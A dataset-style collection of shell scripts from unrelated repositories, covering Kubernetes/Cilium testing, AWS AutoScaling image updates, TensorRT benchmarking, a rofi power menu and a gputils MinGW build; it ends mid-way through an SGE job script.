# -e: abort on error, -u: unset variables are errors, -x: trace commands.
set -eux
# Absolute directory of this script, so it can be invoked from anywhere.
dir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )
# Presumably defines the ${cilium_*} image variables used below — verify.
. "${dir}/../../k8s_versions.sh"
export KUBECONFIG="${dir}/kubeconfig"
# get_state — dump the test namespace's Services and EndpointSlices as YAML.
get_state() {
    kubectl get -n test services,endpointslices -o yaml
}
# The bare ":" commands are no-ops that act as progress labels: with
# `set -x` enabled above, each one is echoed as the script reaches it.
: Start a kind cluster with the EndpointSliceTerminatingCondition gate
kind create cluster --config "${dir}/manifests/kind-config-1.26.yaml" --name graceful-term
: Wait for service account to be created
until kubectl get serviceaccount/default; do
	sleep 5
done
: Preloading images
# Preloading is best-effort; a miss just means kind pulls the image itself.
kind load --name graceful-term docker-image "${cilium_container_repo}/${cilium_container_image}:${cilium_version}" || true
# (fixed: this line previously ended in a redundant duplicated "|| true")
kind load --name graceful-term docker-image "${cilium_container_repo}/${cilium_operator_container_image}:${cilium_version}" || true
: Install cilium
cilium install --wait
: Dump the initial state
kubectl get nodes,ciliumnodes,services,endpointslices -o yaml > "${dir}/init.yaml"
: Apply the graceful-termination.yaml and dump the initial state
kubectl create namespace test
kubectl apply -f "${dir}/manifests/graceful-termination.yaml"
kubectl wait -n test --for=condition=ready --timeout=60s --all pods
get_state > "${dir}/state1.yaml"
: Stop the server
# Deletion runs in the background so the terminating state can be observed.
kubectl -n test delete pod -l app=graceful-term-server &
PID_DELETE=$!
: Wait for endpoint to become terminating and then dump it
kubectl wait -n test --timeout=60s \
	-l kubernetes.io/service-name=graceful-term-svc \
	endpointslices \
	--for=jsonpath='{..endpoints..conditions.terminating}=true'
get_state > "${dir}/state2.yaml"
: Finish deletion and dump the final state
wait $PID_DELETE
get_state > "${dir}/state3.yaml"
: Tear down the cluster
kind delete clusters graceful-term
rm -f "${KUBECONFIG}"
| true |
38b4553b72efb2f70d8eefe8b2c52a633cb719e7 | Shell | deepikabartwal/shellScripts | /boxword.sh | UTF-8 | 154 | 2.703125 | 3 | [] | no_license | #! /bin/bash
input=$1
# Draw the border by replacing every character of "| <word> |" except the
# pipes with "-", then turning the pipes into "+". Using printf (no
# trailing newline) and tr -c fixes two defects of the echo/character-
# class version: the newline no longer becomes a stray trailing "-", and
# punctuation in the word no longer leaves holes in the border.
outlines=$(printf '| %s |' "$input" | tr -c '|' '-' | tr '|' '+')
echo "$outlines"
echo "| $input |"
echo "$outlines"
| true |
fe46c767d4eec97277363f85f85abb5926180574 | Shell | tedle/uitabot | /scripts/test.sh | UTF-8 | 283 | 2.96875 | 3 | [
"ISC"
] | permissive | #!/bin/sh
# Run the Python and JS test suites from the repo root; everything the
# suites print is routed to stderr so stdout stays clean.
exec 1>&2
cd "$(git rev-parse --show-toplevel)"

failed=0
(cd bot; pytest) || failed=1
(cd web-client; npm run --silent test) || failed=1

if [ "$failed" -ne 0 ]; then
    exit 1
fi
echo All tests completed successfully
exit 0
| true |
8d349d2bb0d4f743bce5258bb93924150865d4d7 | Shell | vmlemon/eve | /pkg/pillar/scripts/generate-onboard.sh | UTF-8 | 484 | 3.578125 | 4 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | #!/bin/sh
#
# Copyright (c) 2018 Zededa, Inc.
# SPDX-License-Identifier: Apache-2.0
#
# Generate a self-signed ECC certificate; 7 day lifetime
# argument is a basename for the output files
# Example: generate-pc.sh ../run/test
# will place the private key in ../run/test.key.pem and the cert in
# ../run/test.cert.pem
# Require exactly one argument: the basename for the output key/cert files.
if [ $# -ne 1 ]; then
    echo "Usage: $(basename "$0") <output basename>"
    exit 1
fi
# Delegate to the sibling script with the fixed 7-day lifetime.
dir=$(dirname "$0")
"$dir"/generate-self-signed.sh 7 "$1"
| true |
55b9173dcc34eab0b173c3d33d20705549889dab | Shell | bridgecrew-perf7/DeepLearningDeployment | /tensorrt/cpp_deploy/scripts/test_time.sh | UTF-8 | 686 | 2.671875 | 3 | [] | no_license | #!/bin/bash
# Serialize any ONNX model that does not yet have a TensorRT engine.
cd /content/DeepLearningDeployment/tensorrt/serialize_engine_from_onnx_cpp/bin
for MODEL in resnet50 resnet101 efficientnet-b4 efficientnet-b5 efficientnet-b6 efficientnet-b7; do
    if [ -e "/content/ONNX_MODELS/$MODEL.trt" ]; then
        echo "$MODEL.trt exists"
    else
        echo "$MODEL"
        ./trt_serialize "/content/ONNX_MODELS/$MODEL.onnx" "/content/ONNX_MODELS/$MODEL.trt"
    fi
done

# Time inference for every engine; the script's first argument is
# forwarded to trt_inference as-is.
cd /content/DeepLearningDeployment/tensorrt/cpp_deploy/bin
for MODEL in resnet101 resnet50 efficientnet-b4 efficientnet-b5 efficientnet-b6 efficientnet-b7; do
    echo "$MODEL"
    ./trt_inference "/content/ONNX_MODELS/$MODEL.trt" /content/DeepLearningDeployment/sample.jpg $1
done
| true |
6cb580657d84b9dd3bf00c3d938ef9ce7fde9f40 | Shell | RobinZweifel/Scripts122 | /scripts/beispielAufgaben/entscheidung2.sh | UTF-8 | 482 | 3.859375 | 4 | [] | no_license | #!/bin/bash
# Script: entscheidung2.sh — checks that both file arguments exist.
# Usage:  entscheidung2.sh filename1 filename2
if test $# -ne 2
then
	echo "Sie müssen zwei Dateinamen als Argumente eingeben!"
	echo "Usage: entscheidung.sh dateiname1 dateiname2"
else
	# "$1"/"$2" are now quoted: unquoted, file names containing spaces
	# broke the `test -e` checks.
	if test -e "$1"
	then
		echo "Die Datei existiert"
	else
		echo "Die Datei \"$1\" existiert nicht"
		exit 1
	fi
	if test -e "$2"
	then
		echo "Die Datei existiert"
	else
		echo "Die Datei \"$2\" existiert nicht"
		exit 1
	fi
fi
| true |
e04bc5c5fe9f7b767fe0642d3d929abcc42089a1 | Shell | DataShades/opswx-ckan-cookbook | /files/default/updateasg | UTF-8 | 7,228 | 4.03125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#
# This script snapshots the current instance volume, and updates the ASG from it
# ============== Script Parameters =======================
# Instance metadata: availability zone, its region (zone minus the final
# zone letter) and this instance's id.
placement=$(wget -q -O - http://169.254.169.254/latest/meta-data/placement/availability-zone)
region=${placement%?}
myid=$(wget -q -O - http://169.254.169.254/latest/meta-data/instance-id)
# Root EBS volume attached at /dev/xvda: id and size (GiB), reused for
# the snapshot and the AMI block-device mapping.
volume=$(aws ec2 describe-volumes --filters Name=attachment.instance-id,Values="${myid}" Name=attachment.device,Values='/dev/xvda' --region $region)
vol_id=$(echo ${volume} | jq '.Volumes[].VolumeId' | tr -d '"')
vol_size=$(echo ${volume} | jq '.Volumes[].Size' | tr -d '"')
# This instance's security groups, machine type and key pair — copied
# into the new launch configuration.
instance=$(aws ec2 describe-instances --region $region --instance-ids $myid)
secgrps=$(echo ${instance} | jq '.Reservations[].Instances[].SecurityGroups[].GroupId' | tr -d '"')
instsize=$(echo ${instance} | jq '.Reservations[].Instances[].InstanceType' | tr -d '"')
keyname=$(echo ${instance} | jq '.Reservations[].Instances[].KeyName' | tr -d '"')
DATE=$(date +"%Y%m%d_%H%M")
Description="Automated GM snapshot of ${vol_id} "${DATE}
# ============== Function Definitions =======================
# Creates snapshot for new AMI
#
# Snapshots the root volume ($vol_id) and polls every 5 seconds until the
# snapshot leaves the 'pending' state, drawing an in-place progress
# indicator (the percentage is erased with backspaces each cycle).
# Sets $snapid for create_ami.
# NOTE(review): only 'pending' is handled — a snapshot that ends in the
# 'error' state would let the script continue; confirm acceptable.
function create_snapshot
{
	echo -ne "Creating snapshot of $vol_id"
	snapid=$(aws ec2 create-snapshot --volume-id $vol_id --description "${Description}" --region $region | jq '.SnapshotId' | tr -d '"')
	snapstatus='pending'
	while [ $snapstatus = 'pending' ]; do
		snapshot=$(aws ec2 describe-snapshots --snapshot-id ${snapid} --region $region)
		snapstatus=$(echo $snapshot | jq '.Snapshots[0].State' | tr -d '"')
		snappc=$(echo $snapshot | jq '.Snapshots[0].Progress' | tr -d '"')
		# One backspace per character of the progress string, so the next
		# iteration overwrites it in place.
		bs=$(printf '%0.s\b' $(seq 1 ${#snappc}))
		echo -ne ".${snappc}"
		sleep 5
		echo -ne "${bs}"
	done
}
# Creates new AMI from snapshot, and new Launch config from generated AMI
#
# Registers a HVM image whose root device points at $snapid, then creates a
# launch configuration mirroring this instance (type, security groups, key).
# Sets the globals $ami and $launchid.
function create_ami
{
	echo -ne ".Creating AMI..."
	ami=$(aws ec2 register-image --name "AUTO-WEB-GM_${DATE}" --root-device-name "/dev/sda1" --architecture "x86_64" --virtualization-type "hvm" --region $region --block-device-mappings "{\"DeviceName\": \"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\": true,\"VolumeType\":\"gp2\",\"VolumeSize\":${vol_size},\"SnapshotId\": \"${snapid}\"}}" | jq '.ImageId' | tr -d '"')
	launchid=$(aws autoscaling create-launch-configuration --launch-configuration-name "AUTO-WEB-GM_${DATE}" --image-id ${ami} --instance-type ${instsize} --security-groups ${secgrps} --key-name ${keyname} --block-device-mappings "{\"DeviceName\": \"/dev/sda1\",\"Ebs\":{\"DeleteOnTermination\": true,\"VolumeType\":\"gp2\",\"VolumeSize\":${vol_size},\"SnapshotId\": \"$snapid\"}}" --region $region)
	echo "Done."
}
# Updates selected ASG with new Launch config
#
# Points the chosen AutoScaling group ($asg, selected interactively below)
# at the launch configuration created by create_ami.
function update_asg
{
	aws autoscaling update-auto-scaling-group --auto-scaling-group-name ${asg} --launch-configuration-name AUTO-WEB-GM_${DATE} --region ${region}
	echo "${asg} updated to 'AUTO-WEB-GM_${DATE}'"
}
# Checks the running state of an instance id
#
# Emits the EC2 state name (e.g. "running") for instance id $1, stripped of
# quotes and line terminators, with no trailing newline.
function get_instance_state
{
	aws ec2 describe-instances --instance-ids $1 --region ${region} \
		| jq '.Reservations[].Instances[].State.Name' \
		| tr -d '"\r\n'
}
# NOTE(review): despite its name, this function never calls
# "aws ec2 terminate-instances" — it only reports when the instance is not
# already terminated, so the churn phase is effectively a dry run.
# Confirm whether the terminate call was removed on purpose.
function terminate_instance
{
	local killid=$1
	echo "Terminating old ASG instance ${killid}"
	instate=$(get_instance_state ${killid})
	if [ "${instate}" != "terminated" ]; then
		echo "I didn't kill ${killid}"
	fi
}
# ============== Script Body =======================
echo -e "Automated ASG Update\r\n"
if [ -z $vol_id ]; then
echo 'Unable to identify root volume'
exit 1;
fi
create_snapshot
create_ami
# Get a list of Autoscale Groups for user selectable update of launch config
#
asglist=$(aws autoscaling describe-auto-scaling-groups --region $region | jq '.AutoScalingGroups[].AutoScalingGroupName' | tr -d '"')
readarray asgs <<< "${asglist}"
counter=1
for asg in "${asgs[@]}"
do
asgname=$(echo ${asg} | tr -d '\n\r')
echo -e "[${counter}] ${asgname}"
(( counter++ ))
done
echo "Select AutoScaleGroup to update. [0] to exit: "
read asgopt
# Exit if user doesn't want to update any Autoscale Groups
#
if [ ${asgopt} -eq 0 ]; then
echo "Update ASG with Launch configuration 'AUTO-WEB-GM_${DATE}'"
exit 0;
fi
# Make sure user really wants to update the selected ASG
#
asg=$(echo ${asgs[ ${asgopt} - 1 ]} | tr -d '\n\r')
echo -ne "Update ${asg} with Launch configuration 'AUTO-WEB-GM_${DATE}'? Type 'yes' to proceed: "
read updateasg
if [ $updateasg != 'yes' ]; then
echo "Update ASG with Launch configuration 'AUTO-WEB-GM_${DATE}'"
exit 0
fi
update_asg
# Get info about the selected ASG so we can optionally churn out existing instances if any are running
#
asginfo=$(aws autoscaling describe-auto-scaling-groups --region $region --auto-scaling-group-name $asg)
asgdesired=$(echo $asginfo | jq '.AutoScalingGroups[0].DesiredCapacity' | tr -d '"')
# Exit if no instances to churn
#
if [ ${asgdesired} -lt 1 ]; then
echo "No web nodes in ${asg} to churn out."
exit 0
fi
# Check user wants to churn out existing instances in ASG
#
echo -ne "${asg} has ${asgdesired} instances to churn. Churn instances? Type 'yes' to proceed: "
read churnasg
# Bail if churn not desired
#
if [ ${churnasg} != 'yes' ]; then
echo "Churn ${asg} instances manually."
exit 0
fi
# Churn two instances at a time unless the ASG only has 2 instances
#
spawnqty=2
if [ ${asgdesired} -lt 2 ]; then
spawnqty=1
fi
# Work out whether maxsize accomodates the extra instances we'll start up for uninterupted churn.
#
required=$((${asgdesired} + ${spawnqty}))
# Get existing instance ids so we can monitor their termination
#
asginstids=$(echo ${asginfo} | jq '.AutoScalingGroups[0].Instances[].InstanceId' | tr -d '"')
echo "Adding ${spawnqty} more instances to ${asg}."
asgmaxsize=$(echo ${asginfo} | jq '.AutoScalingGroups[0].MaxSize' | tr -d '"')
maxsize=${asgmaxsize}
if [ ${asgmaxsize} -lt ${required} ]; then
maxsize=${required}
fi
aws autoscaling update-auto-scaling-group --auto-scaling-group-name ${asg} --max-size ${maxsize} --desired-capacity ${required}
sleep 10
# Wait for new instances to come online
#
curinsts=$(aws autoscaling describe-auto-scaling-groups --region $region --auto-scaling-group-name $asg | jq '.AutoScalingGroups[0].Instances[].InstanceId' | tr -d '"')
readarray ilist <<< "${curinsts}"
online=0
while [ ${online} -lt ${required} ]; do
for inst in "${ilist[@]}"; do
instid=$(echo $inst | tr -d '\n\r')
instate=$(get_instance_state ${instid})
if [ "${instate}" == "running" ]; then
(( online++ ))
fi
done
echo -ne "${online} of ${#ilist[@]} instances online\r\033[K"
done
# Terminate old instances one at a time accounting for a 5 minute cool-off period before the ASG adds another instance
#
readarray ilist <<< "${asginstids}"
for inst in "${ilist[@]}"; do
instid=$(echo $inst | tr -d '\n\r')
terminate_instance ${instid}
done
| true |
289c4cebc04cfeb3041ec6b207ab0842b8d13ac4 | Shell | severinmeyer/bachelor | /attachments/create-schemas.sh | UTF-8 | 912 | 3.703125 | 4 | [] | no_license | #!/bin/sh -e
# TASK
# Transform content/partNN/classNN.xml
# into content/partNN/catalogNN.xsd
# with stylesheets/transform.xsl
#
# NOTE
# Each specific catalogue schema uses a dedicated target
# namespace. However, it is not possible to dynamically
# create namespace attributes with XSLT [1, Section 7.6.2].
# As a workaround, the XSLT stylesheet embeds the string
# CONTENTPARTNUMBER, which is replaced with the part number
# after a schema is created.
#
# [1] James Clark: XSL Transformations (XSLT) Version 1.0,
# W3C Recommendation, 1999, http://www.w3.org/TR/1999/REC-xslt-19991116/
#
# DEPENDENCIES
# libxslt-tools <http://xmlsoft.org/XSLT.html>
for class in content/part*/class*.xml; do
	# Characters 13-14 of "content/partNN/..." are the two-digit part number.
	# ("cut --characters" is a GNU long option; BSD cut would need -c 13-14.)
	part=$(echo "$class" | cut --characters 13-14)
	schema="content/part$part/catalog$part.xsd"
	# Transform the class file and replace the CONTENTPARTNUMBER placeholder
	# with the real part number (see the NOTE in the header above).
	xsltproc stylesheets/transform.xsl "$class" |\
	sed "s/CONTENTPARTNUMBER/$part/g" > "$schema"
done
| true |
a8cd35474fc3a3446548bfbe1b61c5a4876e1ec0 | Shell | dabercro/WTagStudy | /docs/160705/figs/download.sh | UTF-8 | 476 | 3.21875 | 3 | [] | no_license | #!/bin/bash
dirs="old new small powheg herwig"
images="semilep_full_fatjetPrunedM.pdf semilep_full_fatjettau21.pdf"
for dir in $dirs
do
if [ ! -d $dir ]
then
mkdir $dir
fi
url=http://dabercro.web.cern.ch/dabercro/plots/16070
if [ "$dir" = "small" ]
then
url=$url\5/
else
url=$url\4_$dir/
fi
for image in $images
do
echo $url$image
wget $url$image
mv $image $dir/$image
done
done | true |
16a981e86ac8f92e36b7f3e28c36ec83b513366f | Shell | mcules/Zabbix-Wordpress-Template | /wp-upgrade-check.sh | UTF-8 | 1,264 | 4.25 | 4 | [] | no_license | #!/bin/bash
#
# Script will find all wordpress installs and check if they're out of date
#
# Using wp-cli - http://wp-cli.org/
# Paths to search for wordpresses. Separated by space.
PATHS="/var/www"
# Paths to ignore (should not be checked). End with semicolon ;
IGNOREPATHS="/var/www/path1;/var/www/path2/old/wordpress;"
WPCLI=/usr/local/bin/wp-cli
# Every directory that contains a wp-includes folder is treated as a WP root.
WORDPRESSES=$(find $PATHS -type d -name "wp-includes" -print)
# Loop through results
for WPATH in $WORDPRESSES; do
    # Strip wp-includes from path
    WPATH=$(dirname $WPATH)
    # If folder is excluded, continue
    # (removing "$WPATH;" from IGNOREPATHS only changes the string when
    # WPATH is actually listed there)
    if [ "${IGNOREPATHS/$WPATH;}" != "$IGNOREPATHS" ]; then
        continue;
    fi
    # debug display path
    #echo "$WPATH"
    #continue;
    # Get core update
    # First output line containing a version number; column 1 is the version.
    WPUPDATE=$($WPCLI --allow-root --path=$WPATH core check-update | grep -P -m 1 "\d\.\d" | cut -f1)
    if [ ! -z "$WPUPDATE" ]
    then
        WPUPDATE="core->$WPUPDATE"
    fi
    # Get plugin updates
    # Status lines starting with "U" mean an update is available; field 3 is
    # the plugin name.
    while read -r line
    do
        WPUPDATE="$WPUPDATE plugin->$line"
    done< <($WPCLI --allow-root --path=$WPATH plugin status | grep -P "^\sU" | cut -d" " -f3)
    # Print output
    # ${WPATH:9} drops the leading "/var/www/" (9 characters) for brevity.
    if [ -z "$WPUPDATE" ]
    then
        echo "${WPATH:9} OK"
    else
        echo "${WPATH:9} $WPUPDATE"
    fi
done
| true |
705b4a239b581b4051474fc9d2d25bf44ab06f10 | Shell | hinamae/shell | /no102set/no102 | UTF-8 | 641 | 3.4375 | 3 | [] | no_license | #!/bin/bash
# Define the path of the data file.
datafile="$HOME/documents/unix_lessons/test/no102set/sample.dat"
# Check that the data file exists.
if [ -f "$datafile" ]; then
	# Commented out: no longer needed after a specification change.
	#./myapp "$datafile"
	# In shell scripts an empty if branch is a syntax error — at least one
	# command is required inside the branch.  Since an empty branch cannot
	# be written, the null command (:) is placed here instead.
	:
else
	# Report the missing file on standard error.
	echo "データファイルが存在しません: $datafile" >&2
	exit 1
fi
| true |
92e22f14f8f86bb1d28b66df2281dc03261e67a2 | Shell | ljurk/dot | /bin/.bin/powermenu | UTF-8 | 1,498 | 3.578125 | 4 | [] | no_license | #!/usr/bin/env bash
theme="$HOME/.config/rofi/powermenu.rasi"
# CMDs
uptime="`uptime -p | sed -e 's/up //g'`"
# Options
shutdown=''
reboot=''
lock=''
suspend=''
logout=''
yes=''
no=''
# Rofi CMD
# Top-level power menu: shows the action icons with the uptime as the prompt.
# Fix: ${theme} is now quoted — unquoted it word-splits when $HOME contains
# spaces, breaking the -theme argument.
rofi_cmd() {
    rofi -dmenu \
        -p "Uptime: $uptime" \
        -mesg "Uptime: $uptime" \
        -theme "${theme}"
}
# Confirmation CMD
# Two-column yes/no confirmation dialog built from inline theme overrides.
# Fix: ${theme} is now quoted so paths containing spaces do not word-split.
confirm_cmd() {
    rofi \
        -theme-str 'mainbox {children: [ "message", "listview" ];}' \
        -theme-str 'listview {columns: 2; lines: 1;}' \
        -theme-str 'element-text {horizontal-align: 0.5;}' \
        -theme-str 'textbox {horizontal-align: 0.5;}' \
        -dmenu \
        -p 'Confirmation' \
        -mesg 'Sure?' \
        -theme "${theme}"
}
# Ask for confirmation
# Feed the yes/no glyphs, one per line, into the confirmation dialog.
confirm_exit() {
    printf '%s\n' "$yes" "$no" | confirm_cmd
}

# Pass variables to rofi dmenu
# Feed the five action glyphs, one per line, into the main menu.
run_rofi() {
    printf '%s\n' "$shutdown" "$reboot" "$lock" "$suspend" "$logout" | rofi_cmd
}
# Execute Command
# Asks for confirmation, then dispatches the requested action ($1).
# Exits quietly when the user does not pick the "yes" glyph.
run_cmd() {
    selected="$(confirm_exit)"
    if [[ "$selected" != "$yes" ]]; then
        exit 0
    fi
    case "$1" in
        --shutdown)
            systemctl poweroff
            ;;
        --reboot)
            systemctl reboot
            ;;
        --suspend)
            mpc -q pause
            amixer set Master mute
            systemctl suspend
            ;;
        --logout)
            i3-msg exit
            ;;
    esac
}
# Actions
# Show the menu and dispatch on the chosen glyph.  i3lock runs immediately;
# every other action goes through the confirmation dialog in run_cmd.
chosen="$(run_rofi)"
case ${chosen} in
    $shutdown)
        run_cmd --shutdown
        ;;
    $reboot)
        run_cmd --reboot
        ;;
    $lock)
        i3lock
        ;;
    $suspend)
        run_cmd --suspend
        ;;
    $logout)
        run_cmd --logout
        ;;
esac
| true |
9f315d065849ad357e703fb0f08bd7f85b6854b2 | Shell | ilovezfs/gputils | /scripts/build/mingw/make-mingw | UTF-8 | 10,205 | 3.75 | 4 | [] | no_license | #!/bin/sh
# make-mingw - build the mingw binary distribution
# Copyright (C) 2002, 2003
# Craig Franklin
#
# This file is part of gputils.
#
# gputils is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# gputils is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with gputils; see the file COPYING. If not, write to
# the Free Software Foundation, 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
# This script has a lot of extras which will probably never be used. It was
# originally intended to generate binaries for any OS, but that is unnecessary.
# The only binaries we are generating are for mingw or rpm. rpm is handled
# elsewhere, so this script only has to take care of mingw.
# Options for the system on which the package will run.
# Building on MinGW/Cygwin uses the native 32-bit toolchain and the installed
# NSIS; anywhere else we cross-compile with the mingw-w64 toolchain.
case $(uname) in
  *MINGW*|*CYGWIN*)
    TOOLSPREFIX="i686-pc-mingw32-"
    MAKENSIS="c:/Program Files/NSIS/makensis"
    ;;
  *)
    TOOLSPREFIX="i686-w64-mingw32-"
    MAKENSIS=makensis
    ;;
esac
# Honour tool variables already set in the environment; otherwise derive
# them from the prefix chosen above.
test -z "${CC}" && CC="${TOOLSPREFIX}gcc"
test -z "${AR}" && AR="${TOOLSPREFIX}ar"
test -z "${RANLIB}" && RANLIB="${TOOLSPREFIX}ranlib"
test -z "${STRIP}" && STRIP="${TOOLSPREFIX}strip"
test -z "$CFLAGS" && CFLAGS="-s -O2"
distname="mingw32"
host=i386-mingw32msvc
# Probe once whether the installed unix2dos understands -q (quiet mode).
if expr "$(unix2dos -q < /dev/null 2>&1)" : '.*-q: unknown option' >/dev/null
then
  UNIX2DOS="unix2dos"
else
  UNIX2DOS="unix2dos -q"
fi
# autoconf can't test cross compilers, so set the variables in the configure
# command line.
config_options="ac_cv_func_malloc_0_nonnull=yes \
ac_cv_func_realloc_0_nonnull=yes"
doc="gputils.pdf"
comments="None. "
delete_dir="lib man include"
common="AUTHORS COPYING ChangeLog NEWS README"
use_zip=yes
clean=yes
print_banner()
{
  # Print the message framed above and below by a line of '=' characters of
  # the same length.  With no argument, print usage and exit with status 1.
  if [ $# = 0 ] ; then
    echo "Usage: printbanner \"message\""
    exit 1
  fi
  frame=$(echo "$1" | sed 's/./=/g')
  echo "$frame"
  echo "$1"
  echo "$frame"
  return 0
}
data_file ()
{
  # Emit the DISTRIBUTION.txt metadata block for the binary package.
  # Reads the globals NAME, EMAIL, host, version and comments.  A single
  # here-document replaces the original run of echo statements; the
  # expanded text is identical.
  cat <<EOF
======================================================================
gputils Binary Distribution
======================================================================
Maintainer: $NAME
Email: $EMAIL
Date: $(date +%x)
Host: $host
Src version: $version
======================================================================
Comments:
$comments

======================================================================
Notes:
This is a binary gputils distribution. This file was not necessarily
generated by the gputils project. It was generated by the maintainer
listed above. If you have any problems with the distribution, contact
the maintainer first.
 
The gputils sourcecode and support are available at:
<URL:http://gputils.sourceforge.net/>

======================================================================
EOF
}
################################################################################
# process options
################################################################################
# Configure-style option parser: walks the positional arguments, accepting
# both "--opt=value" and two-word options (via ac_prev).
for ac_option
do
  # If the previous option needs an argument, assign it.
  if test -n "$ac_prev"; then
    eval "$ac_prev=\$ac_option"
    ac_prev=
    continue
  fi
  # Split "--opt=value" into its value part (empty for flag-style options).
  case "$ac_option" in
  -*=*) ac_optarg=`echo "$ac_option" | sed 's/[-_a-zA-Z0-9]*=//'` ;;
  *) ac_optarg= ;;
  esac
  case "$ac_option" in
  --build=*)
    build="$ac_optarg"
    ;;
  --release=*)
    release="$ac_optarg"
    ;;
  --email=*)
    EMAIL="$ac_optarg"
    ;;
  --help)
    cat << EOF
Usage: make-mingw [options]
Options: [defaults in brackets after descriptions]
Configuration:
  --help                  print this message
  --email=EMAIL           email address of the maintainer
  --name=NAME             name of the maintainer
  --save-temps            leave temporary directories
Directory and file names:
  --release=NUMBER        release number of the distribution [none]
  --patch=PATCH           patch applied to source
  --source=SRCFILENAME    name of the source file
Host type:
  --build=BUILD           configure for building on BUILD [guessed]
EOF
    exit 0
    ;;
  --save-temps)
    clean=no
    ;;
  --name=*)
    NAME="$ac_optarg"
    ;;
  --source=*)
    srcfilename="$ac_optarg"
    ;;
  --patch=*)
    patch="$ac_optarg"
    ;;
  *)
    echo "invalid option, use --help to show usage"
    exit 1
    ;;
  esac
done
################################################################################
# extract files from source archive
################################################################################
if [ ! "$srcfilename" ]; then
echo "error: specify source filename using --source=FILENAME"
exit 1
elif [ ! -f "$srcfilename" ]; then
echo "$srcfilename: No such file"
exit 1
else
# determine the src directory and version
archive_type=`echo "$srcfilename" | sed -e 's%.*-.\..\..\..*\.\(.*\)%\1%'`
version=`echo "$srcfilename" | sed -e 's%.tar.'"$archive_type"'%%g'`
ver=`echo "$version" | sed -e 's%.*-\(.*\)%\1%'`
ver_major=`echo "$ver" | awk 'BEGIN {FS="."} {print $1}'`
ver_minor=`echo "$ver" | awk 'BEGIN {FS="."} {print $2}'`
ver_revision=`echo "$ver" | awk 'BEGIN {FS="."} {print $3}'`
ver_build=0
# extract the files
rm -Rf "$version"
if test "$archive_type" = "bz2"; then
tar -jxf "$srcfilename"
else
tar -zxf "$srcfilename"
fi
# make the distribution directory
root_dir="`pwd`"
dist_dir="`pwd`/dist"
rm -Rf "$dist_dir"
mkdir -p "$dist_dir/gputils"
fi
# copy the patch to the distribution and patch the source
if [ "$patch" ]; then
if [ -f "$patch" ]; then
echo "copying patch to binary distribution... $patch. "
cp "$patch" "$dist_dir/gputils"
echo "patching source..."
patch -p0 < "$patch"
else
echo "error: patch file \"$patch\" not found."
exit 1;
fi
fi
# change to the source directory
if [ -d "$version" ]; then
cd "$version"
echo "changing to source directory... $version"
else
echo "error: directory \"$version\" not found"
exit 1
fi
################################################################################
# check the options
################################################################################
# Define the host system (mingw)
config_options="$config_options --host=$host"
echo "checking host system type... $host"
# Detect the system that the distribution to be built on.
if [ ! "$build" ]; then
  build=`./config.guess`
fi
config_options="$config_options --build=$build"
echo "checking build system type... $build"
echo "checking maintainer name... $NAME"
echo "checking maintainer email address... $EMAIL"
# if release is not specified use "1"
# (in practice an empty release just drops the dash suffix entirely)
dash_release=""
if [ "$release" ]; then
  dash_release="-$release"
fi
echo "checking distribution dash number... $dash_release"
# generate the complete distribution name
distname="$version-$distname$dash_release"
echo "checking distribution name... $distname"
################################################################################
# compile the project and install files to the distribution directory
################################################################################
print_banner "Configuring project"
CC="${CC}" CFLAGS=${CFLAGS} AR="${AR}" RANLIB="${RANLIB}" STRIP="${STRIP}" GPUTILS_HTMLDOC_PATH="${dist_dir}/gputils/doc/html-help" ./configure --prefix="${dist_dir}/gputils" --datadir="${dist_dir}" \
$config_options
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: configuring gputils failed"
exit 1
fi
print_banner "Compiling project"
make
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: compiling gputils failed"
exit 1
fi
print_banner "Installing files"
make install
RETVAL=$?
if [ $RETVAL -ne 0 ]; then
echo "error: gputils install failed"
exit 1
fi
print_banner "Copying project data to distribution directory"
# copy the common files
for x in $common
do
cp "$x" "$dist_dir/gputils/$x.txt"
$UNIX2DOS "$dist_dir/gputils/$x.txt"
done
echo "copying project data... $common"
# copy the docs
mkdir "$dist_dir/gputils/doc"
for x in $doc
do
cp "./doc/$x" "$dist_dir/gputils/doc"
done
echo "copying project documents... $doc"
# remove unnecessary directories
for x in $delete_dir
do
rm -Rf "$dist_dir/gputils/$x"
done
echo "removing directories... $delete_dir"
# generate the binary distribution data file
data_file > "$dist_dir/gputils/DISTRIBUTION.txt"
$UNIX2DOS "$dist_dir/gputils/DISTRIBUTION.txt"
echo "creating binary data file... DISTRIBUTION.txt"
# copy the NSIS script and icon
cp "$root_dir/gputils.nsi" "$dist_dir/gputils/gputils.nsi"
echo "copying NSIS script... gputils.nsi"
# convert the remaining project data to dos format
$UNIX2DOS $dist_dir/gputils/header/*
$UNIX2DOS $dist_dir/gputils/lkr/*
echo "converting project data to DOS format... done"
################################################################################
# make the archive
################################################################################
cd "$dist_dir"
if test x$use_zip = xyes; then
filename="$distname.zip"
zip -r "$filename" gputils
elif test "$archive_type" = "bz2"; then
filename="$distname.tar.$archive_type"
tar -jcvf "$filename" gputils
else
filename="$distname.tar.$archive_type"
tar -zcvf "$filename" gputils
fi
if [ -f "$filename" ]; then
mv "$filename" ..
print_banner "$filename ready for distribution"
fi
# clean the dist and src directories
cd ..
if test x$clean = xyes; then
rm -Rf "$version"
rm -Rf "$dist_dir"
fi
cd "dist/gputils"
"${MAKENSIS}" -DVER_MAJOR=$ver_major -DVER_MINOR=$ver_minor -DVER_REVISION=$ver_revision -DVER_BUILD=$ver_build -DDASH_RELEASE="" gputils.nsi
exit
| true |
8b227b8f54efc3c985635650effbc1e251eb9187 | Shell | Lloyd-LiuSiyi/TWAS-pipeline | /gtex-fusion.sge | UTF-8 | 1,141 | 2.625 | 3 | [] | no_license | #!/bin/bash
# 12-7-2017 MRC-Epid JHZ
# For every GTEx tissue in GTEx.list and every chromosome 1-22, write a job
# script (sge.sh) that runs FUSION.assoc_test.R, filters the top hits with
